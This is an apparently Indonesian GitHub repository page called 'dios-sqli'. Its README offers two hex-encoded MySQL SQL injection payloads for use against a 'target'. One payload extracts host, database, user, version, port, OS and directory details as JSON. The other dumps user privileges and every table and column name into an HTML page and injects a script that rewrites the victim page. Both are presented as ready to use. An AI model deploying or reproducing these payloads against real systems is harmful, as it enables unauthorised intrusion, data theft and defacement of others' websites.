Skip to content
/ dios-sqli Public

Kumpulan dios yang bisa kalian gunakan untuk mendapatkan informasi dari target

3 stars 5 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

binsarjr/dios-sqli

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
dios
dios
 
 
README.md
README.md
 
 

Repository files navigation

Kumpulan DIOS SQLi

ini adalah sebuah PoC terkait Celah Keamanan SQL, beberapa query yang ada disini akan bekerja secara otomatis untuk menghitung jumlah tabel dan kolom lalu mengembalikan data tersebut.

Flowchart (Alur) DIOS

SQLi information gathering - JSON

dios ini akan mengekstrak informasi target dan mengembalikan hasil dengan format JSON

/*!00000concat*/(0x3c73716c696e6a656374696f6e3e,0x7b,0x22686f73746e616d65223a22,/*!00000@@hostname*/,0x222c,0x226461746162617365223a22,/*!00000database()*/,0x22,0x2c2275736572223a22,/*!00000user()*/,0x22,0x2c,0x2276657273696f6e223a22,/*!00000@@version*/,0x222c,0x22706f7274223a22,/*!00000@@PORT*/,0x222c,0x226f73223a22,/*!00000@@version_compile_os*/,0x222c,0x22617263686974656374757265223a22,/*!00000@@VERSION_COMPILE_MACHINE*/,0x222c,0x2262617365646972223a22,/*!00000@@BASEDIR*/,0x222c,0x2264617461646972223a22,/*!00000@@datadir*/,0x222c,0x2273736c223a22,/*!00000@@GLOBAL.have_ssl*/,0x222c,0x226f70656e5f73736c223a22,/*!00000@@HAVE_OPENSSL*/,0x222c,0x2273796d6c696e6b223a22,/*!00000@@GLOBAL.have_symlink*/,0x222c22736f636b6574223a22,/*!00000@@SOCKET*/,0x22,0x7d,0x3c2f73716c696e6a656374696f6e3e)

Dios SQLi With JSO

dios ini dibuat untuk mempermudah anda melihat informasi dari target

/*!00000CoNcAt*/(0x3c6469762069643d2764696f734279496e646f736563273e3c6c696e6b2072656c3d227374796c6573686565742220687265663d2268747470733a2f2f6d617863646e2e626f6f74737472617063646e2e636f6d2f626f6f7473747261702f342e332e312f6373732f626f6f7473747261702e6d696e2e637373223e3c64697620636c6173733d276d792d35273e3c63656e7465723e3c696d67207372633d2268747470733a2f2f656e637279707465642d74626e302e677374617469632e636f6d2f696d616765733f713d74626e3a414e64394763534965525179622d6d62444b3432413849474a70734a6d4d4172694c5155656d587a594e7972666a4a7a423576787754766d2220636c6173733d226d782d6175746f20642d626c6f636b20696d672d666c75696422207469746c653d22496e646f7365632220616c743d22496e646f73656322207374796c653d2277696474683a2032303070783b206865696768743a20323030707822202f3e3c2f63656e7465723e3c683220636c6173733d22746578742d63656e74657220746578742d64616e676572223e3c623e44494f53204279207b20494e444f534543207d3c2f623e3c2f68323e3c63656e7465723e3c736d616c6c3e3c623e446174653a20,/*!00000NOW()*/,0x3c2f623e3c2f736d616c6c3e3c2f63656e7465723e3c62723e3c64697620636c6173733d22636f6e7461696e6572223e3c7461626c6520636c6173733d227461626c65207461626c652d73747269706564207461626c652d626f726465726564207461626c652d686f766572223e3c74723e3c746820636f6c7370616e3d22322220636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e496e666f726d6174696f6e20476174686572696e673c2f74683e3c2f74723e3c74723e3c74643e486f7374204e616d653a3c2f74643e3c74643e,/*!00000@@hostname*/,0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653a3c2f74643e3c74643e,/*!00000database*/(),0x3c2f74643e3c2f74723e3c74723e3c74643e557365723a3c2f74643e3c74643e,/*!00000current_user*/(),0x3c2f74643e3c2f74723e3c74723e3c74643e4f7065726174696f6e2073797374656d3c2f74643e3c74643e,/*!00000@@version_compile_os*/,0x3c2f74643e3c2f74723e3c74723e3c74643e56657273696f6e3a3c2f74643e3c74643e,/*!00000version*/(),0x3c2f74643e3c2f74723e3c74723e3c74643e506f72743a3c2f74643e3c74643e,/*!00000@@port*/,0x3c2f74643e3c2f74723e3c74723e3c74643e44617461204469723a3c2f74643e3c74643e,/*!00000@@datadir*/,0x3c2f74643e3c2f74723e3c74723e3c74643e53796d6c696e6b3a3c2f74643e3c74643e,/*!00000@@GLOBAL.have_symlink*/,0x3c2f74643e3c2f74723e3c74723e3c74643e53534c3a3c2f74643e3c74643e,/*!00000@@GLOBAL.have_ssl*/,0x3c2f74643e3c2f74723e3c74723e3c74643e50726976696c65676573202f20696e74726f206f757466696c6520636865636b3c2f74643e3c74643e,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c2f74643e3c2f74723e3c2f7461626c653e3c62723e3c7461626c6520636c6173733d227461626c65207461626c652d73747269706564207461626c652d626f726465726564207461626c652d686f766572223e3c74723e3c746820636f6c7370616e3d22322220636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e44554d5020444154413c2f74683e3c2f74723e3c74723e3c746820636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e5461626c65204e616d653c2f74683e3c746820636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e4669656c64204e616d653c2f74683e3c2f74723e3c74723e,(select(@x)from(select(@x:=0x00),(select(0)/*!From*/(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat%20(@x,0x3c74723e3c74643e,table_name,0x3c2f74643e3c74643e,column_name))))x),0x3c2f74723e3c2f7461626c653e3c2f6469763e3c63656e7465723e3c7374726f6e673e4372656174652042792052697a737961642041522046742e2042696e7361724a723c2f7374726f6e673e3c2f63656e7465723e3c2f6469763e3c2f6469763e,0x3c7363726970743e646f63756d656e742e646f63756d656e74456c656d656e742e696e6e657248544d4c3d646f63756d656e742e676574456c656d656e7442794964282764696f734279496e646f73656327292e696e6e657248544d4c3b646f63756d656e742e7469746c653d2244494f53204279207b20494e444f534543207d223c2f7363726970743e,0x3c212d2d203c212d2d203c212d2d203c212d2d203c212d2d20)

About

Kumpulan dios yang bisa kalian gunakan untuk mendapatkan informasi dari target

Topics

hacktoberfest dios-sqli sql-with-jso dios-indosec

Resources

Readme
Activity

Stars

3 stars

Watchers

2 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •